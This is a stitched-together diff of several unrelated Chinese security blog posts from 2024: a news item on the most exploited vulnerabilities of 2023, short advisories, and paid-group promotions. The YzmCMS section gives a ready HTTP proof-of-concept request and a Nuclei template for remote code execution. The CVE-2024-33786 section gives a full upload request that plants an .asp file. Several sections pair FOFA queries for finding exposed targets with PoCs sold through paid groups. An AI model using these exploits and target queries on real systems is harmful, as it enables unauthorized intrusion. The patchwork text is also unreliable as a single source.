[开源客户端qBittorrent 修复已存在14年的RCE漏洞](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247521357&idx=2&sn=dc9695c878770ba5390c627bc3e3681a&chksm=ea94a527dde32c31d351cd6dca491aa437fa8431c26df61f85217feb3f68a6a8070a59cfc195&scene=21#wechat_redirect)
[NSA 的开源员工培训平台 SkillTree 中存在CSRF漏洞](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247520038&idx=2&sn=921e2fe11a431d8a458188b65d0a3b9d&chksm=ea94be4cdde3375abbf6e79690d31fd0c1e2f7bdc02b738a8fc06afa426d4a95adedea7492d3&scene=21#wechat_redirect)
**原文链接**
https://thehackernews.com/2024/11/high-severity-flaw-in-postgresql-allows.html
题图:
Pixabay
 License
****
**本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。**
![](https://mmbiz.qpic.cn/mmbiz_jpg/oBANLWYScMSf7nNLWrJL6dkJp7RB8Kl4zxU9ibnQjuvo4VoZ5ic9Q91K3WshWzqEybcroVEOQpgYfx1uYgwJhlFQ/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/oBANLWYScMSN5sfviaCuvYQccJZlrr64sRlvcbdWjDic9mPQ8mBBFDCKP6VibiaNE1kDVuoIOiaIVRoTjSsSftGC8gw/640?wx_fmt=jpeg "")
**奇安信代码卫士 (codesafe)**
国内首个专注于软件开发安全的产品线。
   ![](https://mmbiz.qpic.cn/mmbiz_gif/oBANLWYScMQ5iciaeKS21icDIWSVd0M9zEhicFK0rbCJOrgpc09iaH6nvqvsIdckDfxH2K4tu9CvPJgSf7XhGHJwVyQ/640?wx_fmt=gif "")
 
觉得不错,就点个 “
在看
” 或 "
” 吧~

View File

@ -0,0 +1,74 @@
# YzmCMS pay_callback.html RCE漏洞
lcyunkong 贫僧法号云空 2024-05-05 12:01
**0x00 阅读须知**
****
**免责声明:****本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的,不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为,需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。**
###
### 0x01 漏洞简介
YzmCMS是一款轻量级、高效且开源的内容管理系统它基于PHP+Mysql架构。这个系统被发现存在RCE漏洞。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/Z8DAfzBiajSYIeA1vkZqfVvF0FPoWibFjzMdxXox765DCwo4VHlnNp0iawAjODY9DicHClOhiboRHn6zRGLjDLQoCSQ/640?wx_fmt=png&from=appmsg "")
### 0x02 漏洞详情
****
**fofa****app="yzmcms"**
****
**Poc**
```
POST /pay/index/pay_callback.html HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/Z8DAfzBiajSYIeA1vkZqfVvF0FPoWibFjznW5ODKeibjJQVIibj6sTGbz9BCUibibpxEnnk0VnwBwq1tTwI8XXHezV9Q/640?wx_fmt=png&from=appmsg "")
**0x03 Nuclie**
```
id: yzmcms-pay_callback-rce
info:
name: yzmcms-pay_callback-rce
author: yunkong
severity: high
description: YzmCMS pay_callback.html RCE漏洞
tags: yzmcms,rce
http:
- raw:
- |-
POST /pay/index/pay_callback.html HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
matchers-condition: and
matchers:
- type: word
part: body
words:
- phpinfo()
- type: status
status:
- 200
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/Z8DAfzBiajSYIeA1vkZqfVvF0FPoWibFjzPCIJdt8VlmswBccRGiaBubdOibibx5w5d6bChgtHsjROE2QZsHE8hQUibQ/640?wx_fmt=png&from=appmsg "")

View File

@ -0,0 +1,82 @@
# [漏洞复现] CVE-2024-33786 中城科信票务管理平台 任意文件上传
原创 不够安全 不够安全 2024-05-05 09:00
本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
系统简介
基础六管控多协同,智慧票务系统以私有/公有云为基础部署,提供票类策略管控、售票流程管控、门票核验管控、营销渠道管控、数据分析管控、财务核销管控功能,与其它业务系统数据共享,协同作业。
```
开发语言:.Net
开发厂商:北京中成科信科技发展有限公司
```
![](https://mmbiz.qpic.cn/mmbiz_png/DT3jlATYvfggc8IujdsrdeBT2L7CibsSkC8XH4Z0JjocnNdIzJmlN4S3WFH3Alzv7ZM85buT91ibz4QKQapW1QjQ/640?wx_fmt=png&from=appmsg "")
空间测绘
```
回复“20240505”获取空间测绘语句
```
漏洞描述
中城科信票务管理平台20.04中存在任意文件上传漏洞,攻击者可以通过上传精心设计的文件来执行任意代码。
影响版本
```
v20.04
```
漏洞验证
```
POST /SystemManager/Introduction.ashx HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 507
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=--------------------------354575237365372692397370
Accept-Encoding: gzip
----------------------------354575237365372692397370
Content-Disposition: form-data; name="file"; filename="5.txt"
Content-Type: image/jpeg
<% Response.Write("c7ff66de90f5b695091cc4826d22d137") %>
----------------------------354575237365372692397370
Content-Disposition: form-data; name="fileName"
test_20240504.asp
----------------------------354575237365372692397370
Content-Disposition: form-data; name="Method"
UpdateUploadLinkPic
----------------------------354575237365372692397370
```
![](https://mmbiz.qpic.cn/mmbiz_png/DT3jlATYvfggc8IujdsrdeBT2L7CibsSkFshtudkdQDpxmCSTKsh8ibSUrINqUBLGt5RicSPzUQqvp3ibtM8XOlEbg/640?wx_fmt=png&from=appmsg "")
访问上传的asp文件成功解析
```
http://xxx.xxx.xxx/UploadImage/20240504xxxxxx_LK.asp
```
![](https://mmbiz.qpic.cn/mmbiz_png/DT3jlATYvfggc8IujdsrdeBT2L7CibsSkd2wpDXABVzUjLZAd7VeKXXibDXpic95aiad0DvpC0KfTYnvuRic4v8kzicw/640?wx_fmt=png&from=appmsg "")
参考链接
```
https://nvd.nist.gov/vuln/detail/CVE-2024-33786
https://github.com/jiankeguyue/VulnerabilityReport/blob/main/zhongcheng_kexin_ticketing_management_platform.md
https://download.csdn.net/blog/column/12593339/137506841
```
**回复“20240505”获取空间测绘语句**
![](https://mmbiz.qpic.cn/mmbiz_gif/DT3jlATYvfggc8IujdsrdeBT2L7CibsSkJBvFxrTH9VwIL5KMj7YpM6Kt8Fzib4cvtVdhBA7HvpM6VT7IutEicLpQ/640?wx_fmt=gif&from=appmsg "")

View File

@ -0,0 +1,91 @@
# 【安全圈】打补丁要快0Day漏洞正在被黑客广泛利用
安全圈 2024-11-15 19:00
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgOvEXHviaXu1fO2nLov9bZ055v7s8F6w1DD1I0bx2h3zaOx0Mibd5CngBwwj2nTeEbupw7xpBsx27Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**关键词**
零日漏洞
近日美国、英国、加拿大、澳大利亚和新西兰五眼联盟网络安全机构联合发布了报告公布了2023年最常被利用的漏洞清单。其中零日漏洞已经成为黑客最常利用的漏洞类型。![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/aBHpjnrGylgtMNBG5BdWxpicSiceJbgianWCz3eAB0nSqQYJ37NymOoGtwMAiauRtrokcKLc8uAy81qjhLiaJqicMgXw/640?wx_fmt=jpeg&from=appmsg "")
该警告强调攻击者们正越来越多地利用零日漏洞入侵企业与2022年相比零日漏洞利用的有所增长。
与前几年旧的、未修补的漏洞占据列表的主导地位不同的是在2023年漏洞利用趋势中零日漏洞利用的激增这反映出攻击者漏洞攻击策略的变化
在漏洞公布后的几天内快速利用。过去,安全漏洞被利用或许需要几个月时间,但现在,发现与利用之间的时间间隔已经减少到了几天甚至是几个小时。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/aBHpjnrGylgtMNBG5BdWxpicSiceJbgianW9WfbLiaXIU2XEFsUny9yekTpCBdV9mSzBUg85NCf1bVZxyloDxKRicNA/640?wx_fmt=jpeg&from=appmsg "")
报告另一个数据也指出,大量漏洞在披露后的两年内被积极利用,突显了及时补丁管理的必要性。
在发布的2023年漏洞利用榜TOP15中CVE-2023-3519漏洞位居榜首该漏洞影响NetScaler ADC和NetScaler Gateway的多个版本包括13.0、13.1、13.1-FIPS、12.1-FIPS和12.1-NDcPP等在修补期间被广泛利用导致了大量的设备被攻陷。
CVE-2023-20198是另外一个排在前列的漏洞影响Cisco IOS XE系统中的Web管理用户界面允许黑客获得设备中最高等级的Level 15权限从而可以完全控制相关设备执行任意命令。此外Log4Shell漏洞CVE-2021-44228影响Apache的Log4j库由于其广泛应用于各种软件应用中即使在最初披露两年后仍然被利用。
Tenable的高级研究员Satnam Narang表示“入选2023年最常被利用漏洞榜的漏洞有一个共同点即它们都暴露于互联网服务或系统中包括从VPN解决方案到远程管理界面。这些面向互联网的系统中往往会使用包含已知漏洞的软件从而导致被黑客成规模利用。
另外在漏洞利用榜中最古老的一个漏洞是七年前公布的CVE-2017-6742即便是到了2023年仍然有很多的黑客在利用该漏洞对企业发起攻击。而根据一些情报信息仍有大约24,000个Cisco IOS和IOS XE系统可能面临CVE-2023-20198漏洞的攻击。
参考来源https://www.helpnetsecurity.com/2024/11/14/top-exploited-vulnerabilities-2023/
  END  
阅读推荐
[【安全圈】B2B数据聚合公司DemandScience泄露超1亿人数据](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065958&idx=1&sn=1807f01b8e0e2abc61992afff89c94a4&chksm=f36e7ce6c419f5f0abd1d7deaa87290d5ad7479179cfd080c46f7640c079e3757a448a968e27&scene=21#wechat_redirect)
[【安全圈】日常搞笑微软最新更新会错误提醒Windows 11 23H2版已经结束支持](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065958&idx=2&sn=44aeae839eb56bde2f1a7c092e31ddc2&chksm=f36e7ce6c419f5f0cee68f4e9a0b094fe8c126b485311a9f0257ae72cbc06fd4d0685f728737&scene=21#wechat_redirect)
[【安全圈】微软已通过最新更新修复Windows 11任务管理器进程数量显示为0的问题](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065958&idx=3&sn=9807a490014c554d42e52fb8c7c92f56&chksm=f36e7ce6c419f5f018dc87552cfc0d7c6c0155e3a0ffccfef21090091de25bd87976f12f1653&scene=21#wechat_redirect)
[【安全圈】与哈马斯有关的黑客对以色列实体实施破坏性攻击](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065958&idx=4&sn=36fd9808b1bce2ca1b1209f764f873d8&chksm=f36e7ce6c419f5f0e66ac58b2ddfc7aa188dc188c85a024b358d7a7c89dc2bc38fe0bf296595&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")
![](https://mmbiz.qpic.cn/mmbiz_png/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEDQIyPYpjfp0XDaaKjeaU6YdFae1iagIvFmFb4djeiahnUy2jBnxkMbaw/640?wx_fmt=png "")
**安全圈**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")
←扫码关注我们
**网罗圈内热点 专注网络安全**
**实时资讯一手掌握!**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")
**好看你就分享 有用就点个赞**
**支持「****安全圈」就点个三连吧!**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")

View File

@ -0,0 +1,112 @@
# 【漏洞分享】edu通杀 新中小学智慧校园信息管理系统 Upload 任意文件上传
Undoubted Security 2024-11-15 11:00
前言
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnKVibeL72YzLH79T4AjdRH13DzX1avCNqbSeU0Xb1nicv59X6oLLh7kDFEvYM8xzc2FNaTyUeuPNejw/640?wx_fmt=png "")
声明:本文仅供学习参考使用,如若造成其他不良影响,均与本公众号无关!
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnKKVhibmmQYk6h7BJniaX1Pkr9ic8Xw9Fu6W3ObsRKIxiaOQ698AxA5OUUiaHO2DZlBAlpjibzKAuNMEYmw/640?wx_fmt=png&from=appmsg "")
漏洞复现
fofa查询语句
```
body="/Login/IndexMobi"
```
‍利用脚本进行检测:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnJZ0w06sxZvssoUwUUXxRyicTMhZic6ZnXBroL1OEZGCCXt6prWA2pXnlB1q3yjToNF9sz54icib4OQjA/640?wx_fmt=png&from=appmsg "")
手工复现:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnJZ0w06sxZvssoUwUUXxRyiczuEXu4N7Coj12lSibhiaUAolbnsniblku6KWDsHYSGPn3PKCCkUuIjV7g/640?wx_fmt=png&from=appmsg "")
后台发送
20241115
右下角点击
在看、点赞
获取POC及批量检测脚本
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnJZ0w06sxZvssoUwUUXxRyicOHlvHxK5Ul4lhPJyyAGpicwGic9KBjM8c1V12fspuG8OtQX6zpicgM2kA/640?wx_fmt=png&from=appmsg "")
关注不迷路
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnLC22Wa3B8Lb3AkPOhcfqzORXBdEyiajPX2GJd1patuUzlhgOZia7X11licPvQvJviakdHTDt0NWxjicOw/640?wx_fmt=png&from=appmsg "")
关注本微信公众号,点击下方微信群,扫码加好友,备注“微信群”,拉你进交流群,后面会在群里抽奖!群里会不定期给大家分享国内外高危严重小技巧
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnKbC2ETLKh1mlITyPdJX8ESLkEQSGHGmvkt50WtyE0TiaTZvw9XQxB1vZGA0CaLhxV7yfXiaR2fJznA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/DLnxHnM3icnKbC2ETLKh1mlITyPdJX8ESLV1l8YTTFX7UGNEfVj6Vro8R9IZ0tGWZ6c2iae63xyutfY8gKr8JqiaQ/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnImqlUjcJo52mlnG45ZdOjgL1WSJlwNlgLkMosQnqib0eJJCQpibhGnlBNI8pP0lbicnk1sv5TiaQQvMQ/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnImqlUjcJo52mlnG45ZdOjgDqZmZibia8anIziaID45XULyF2Xr7ebeDbnicK0FyicribzcMibeCG7g9tyaQ/640?wx_fmt=png "")
**【Nday】知识星球介绍**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnKnOBpBfWhj6WcA84aJtLGfbUEM2lhs30v4Aw4UP4RydILxkkxibTTweNQYVC0wa6TD1omtTt49utA/640?wx_fmt=png&from=appmsg "")
```
为什么要做nday这一块内容呢  
   在打攻防、挖src、做渗透测试的时候总会碰到很多产品、中间件、cms、产商等等系统/设备/网站这种时候可以先进nday刷一波。通常nday的危害都是比较大的在src、项目渗透测试里面一般是都会收的大部分nday在打攻防的时候也是收的。这也就是为什么我想汇总一下nday的原因之一
外面也有很多nday文章为什么这里还要写汇总呢
   原因其实很简单外面的nday都比较零散有时候搜索都是五花八门的不容易找到想要的。还有些nday库不更新或者更新慢给大家带来的体验都是很差的我也有这种感觉这也就是为什么我想汇总一下nday的原因之二。
```
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/DLnxHnM3icnKnOBpBfWhj6WcA84aJtLGf4UtFl3qMwg7LFksnLNnfmF6pMUp3yxZsia3iaWxOIM0IuP4yP5LFYibVw/640?wx_fmt=jpeg&from=appmsg "")
或者在微信公众号后台点击微信群,添加微信,备注来意(微信群),加入交流群参与后续的抽奖活动免费进入知识星球。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DLnxHnM3icnLC22Wa3B8Lb3AkPOhcfqzOgPVvZS2m3yFq0p9LSPmyFxlyEYVJQibItTiaWNiakooek4s6dV5tZCDEQ/640?wx_fmt=png&from=appmsg "")
**END**

View File

@ -0,0 +1,37 @@
# 【漏洞复现】CVE-2024-1512
原创 漏洞文库 漏洞文库 2024-05-05 10:13
## 免责声明
**本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。**
漏洞描述
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件
。WordPress Plugin MasterStudy LMS WordPress Plugin 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过/lms/stm-lms/order/items REST路由的 user参数进行基于联合的SQL注入。
资产测绘
FOFA
## 漏洞复现
关注公众号:"漏洞文库",回复
20240505即可获取POC。
关注公众号:"漏洞文库",回复
20240505
即可获取POC。
关注公众号:"漏洞文库",回复
20240505
即可获取POC。
**想加入交流群的,公众号回复加群即可获取二维码**
```
```

View File

@ -0,0 +1,36 @@
# 【漏洞复现】CVE-2024-1698
原创 漏洞文库 漏洞文库 2024-05-05 10:13
## 免责声明
**本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。**
漏洞描述
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件
。WordPress Plugin NotificationX 存在安全漏洞该漏洞源于对用户提供的参数转义不充分以及对现有SQL查询缺乏充分的准备"type"参数受到SQL注入攻击。
资产测绘
FOFAbody="/wp-content/plugins/notificationx"
## 漏洞复现
关注公众号:"漏洞文库",回复
20240505即可获取POC。
关注公众号:"漏洞文库",回复
20240505
即可获取POC。
关注公众号:"漏洞文库",回复
20240505
即可获取POC。
**想加入交流群的,公众号回复加群即可获取二维码**
```
```

View File

@ -0,0 +1,82 @@
# 【漏洞复现】某平台-testdb-info-leak信息泄露漏洞
原创 南极熊 SCA御盾 2024-11-15 10:58
关注SCA御盾共筑网络安全
(文末见星球活动)
![](https://mmbiz.qpic.cn/mmbiz_png/RxxRc1KlrIhQYYic9ynHLru6nghp1wxBiaCxJmZ6agdTichU2fcaK4UPp73Z0Ynqy3uiaLRKIexTRCIic5ByMZTVWpw/640?wx_fmt=png&from=appmsg "")
**SCA御盾实验室的技术文章仅供参考此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等包括但不限于进行检测或维护参考未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失均由使用者本人负责。本文所提供的工具仅用于学习禁止用于其他**
**为了甄别不法分子或可疑人员,本圈子不接收任何微信未实名认证的人员。进入圈子后,会进行二次甄别。杜绝一切的网络安全事件发生!!!**
****
**01**
**FOFA语法**
> -
```
"HisModules/ErpAdmin/RoleMng/Js/selectDefaultRole.js"||body="var _FactoryData"
```
**02**
**近期发布**
> ![](https://mmbiz.qpic.cn/mmbiz_png/RxxRc1KlrIiaSgW0FiciabtG77R230fJa3kUH94Qc1JSEppBXen1bwj37siavUj9TCJkMoLOB4UATYgnnKsJIbcMHw/640?wx_fmt=png&from=appmsg "")
> ![](https://mmbiz.qpic.cn/mmbiz_png/RxxRc1KlrIiaSgW0FiciabtG77R230fJa3kz9Ofb9NsFH4rrBJjezCmFPibEKC35iahpgYxNg8K70G09FQibqKElaD6g/640?wx_fmt=png&from=appmsg "")
> ****
> **poc详情付费见文末或发布在知识星球**
>
**03**
**星球活动及星球福利**
**永久活动:**
1、通过群里老人进入星球的新人只需79元进入老人也会得到15元现金奖励。加入方式与奖励方式皆通过私聊不支持退款2、星球开通分享有赏功能通过老人分享的星球进入的新人老人返现16元左右新人返现10元左右
3、通过私聊进入星球的只需90元但不支持退款
三、星球福利
1、工作日推送1day或0day、漏洞集合与技术文期间不定期推送实用工具或脚本大型节假日请假
2、补天半自动化交洞脚本已推出价格10-50元视服务而定
4、fofaweb会员key包的web可直接在线使用。不分享会员key
5、hunter充值8折优惠
6、帮忙代导出hunter全量资产具体进入星球后联系星主咨询
![](https://mmbiz.qpic.cn/mmbiz_jpg/RxxRc1KlrIiaUrr0LmPFc4XUP1yNkeSBPpqvbGibuUFianG0hjskaiaZ8Qugk0JIMlffvQX246HzDWO3UpnyKrVkOA/640?wx_fmt=jpeg&from=appmsg "")
**04**
**poc详情**

View File

@ -0,0 +1,44 @@
# 【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞
thelostworld 2024-11-15 20:24
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看)
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x01产品介绍
**易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。**
0x02产品指纹
****
```
body="topvision_oaName"
```
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR9UIZqCptT7UFAm6LdsJcibO1Sq8WKOBnLqVxlmUXrPrTZib4ocSBorp5OLhXzmPltyBI33byhZ7oKQ/640?wx_fmt=png&from=appmsg "")
0x03漏洞复现
**易宝OA /SmartTradeScan/Inventory/GetProductInv 接口处存在SQL注入漏洞**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR9UIZqCptT7UFAm6LdsJcibOVeHzvygwwOnn93q0nCwf1leHIQRZI5micTe9bgxp13cOdyfAhRqc2EQ/640?wx_fmt=png&from=appmsg "")
****
0x04扫码加入星球查看详情
**扫描加入星球不迷路**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibMUiczLZevyribRn1qUpneDyfgJROGIibTVTjgVeErEr7icQzaVX1hBUfB2c4e2lUHP7EhUia0pvKe7Lg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68iabQ9Vb5JGMNXqnzJTc28tomdyWugPkbLp6Kgc9tECG2XXPMTiafwTAw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x05星球介绍
**马赛克安全**
**专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖!!!**
**很多漏洞均为全网首发的0day/1day目前星球已累计发送431个漏洞POC脚本有没有价值只有体会才知道**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibaibL5lI7fXfSskibI19X9GOV7ibcyFnQGyH54BwBEhlKiaE8j536CiacuVvZGMCfhtMF5VXDW2Jp6PDw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,47 @@
# 【漏洞预警】 用友BIP 数据库配置信息泄露
thelostworld 2024-11-15 20:24
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看)
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x01产品介绍
**YonBIP用友商业创新平台是用友在数字经济时代面向成长型、大型企业及巨型企业融合了先进且高可用技术平台和公共与关键商业应用与服务支撑和运行客户的商业创新业务创新、管理变革并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台**
0x02产品指纹
****
```
body="iuap-apcom-workbench/"
```
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8kpbPfI7MzqMym38qXjrxZCMfa5CzSLrEDVcEwMPuqrSbCU0alVU9kYXhziaPHYwYnf1TLU2SbrNQ/640?wx_fmt=png&from=appmsg "")
0x03漏洞复现
**用友BIP /bi/api/SemanticModel/GetOlapConnectionList 接口处存在信息泄露**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8kpbPfI7MzqMym38qXjrxZz8kuksq2YTrhr0eS18X26E1k4iajPib4mbEFZuFQI1LCrTVJqHbIoJ2A/640?wx_fmt=png&from=appmsg "")
0x04扫码加入星球查看详情
**扫描加入星球不迷路**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibMUiczLZevyribRn1qUpneDyfgJROGIibTVTjgVeErEr7icQzaVX1hBUfB2c4e2lUHP7EhUia0pvKe7Lg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68iabQ9Vb5JGMNXqnzJTc28tomdyWugPkbLp6Kgc9tECG2XXPMTiafwTAw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x05星球介绍
**马赛克安全**
**专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖!!!**
**很多漏洞均为全网首发的0day/1day目前星球已累计发送440个漏洞POC脚本有没有价值只有体会才知道**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8kpbPfI7MzqMym38qXjrxZOLJCJwiadXUhF10gcSbRQXn1Zjr3IDn1EeLOtq32y3t9gsbHtpdLsaQ/640?wx_fmt=png&from=appmsg "")
****

View File

@ -0,0 +1,9 @@
# 【漏洞预警】Apache ActiveMQ Jolokia 和 REST API 未授权访问漏洞CVE-2024-32114
cexlife 飓风网络安全 2024-05-05 20:25
![](https://mmbiz.qpic.cn/mmbiz_jpg/ibhQpAia4xu02UMiaibumiczg0L6WkAnpQvHRKQRbiaSDAInMH3MStrDMGLGq1ECIQPHmBBO8bMPzPhAbCibeB9ZibgcPw/640?wx_fmt=other&from=appmsg "")
**漏洞描述:**
Apache ActiveMQ是基于Java Message Service (JMS) 的开源消息中间件,受影响版本中,由于未对Jolokia JMX REST API和Message REST API 添加身份校验,未授权的攻击者可利用暴露通过Jolokia JMX REST API与消息代理进行交互,或者使用Message REST API发送和接收消息,甚至清除或删除消息队列和主题。
![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu02UMiaibumiczg0L6WkAnpQvHRSdeoP87EOkqch3FSLPH1cBiazhjZSbvic5xyofViaZW7LlqePAlJOXAMw/640?wx_fmt=png&from=appmsg "")
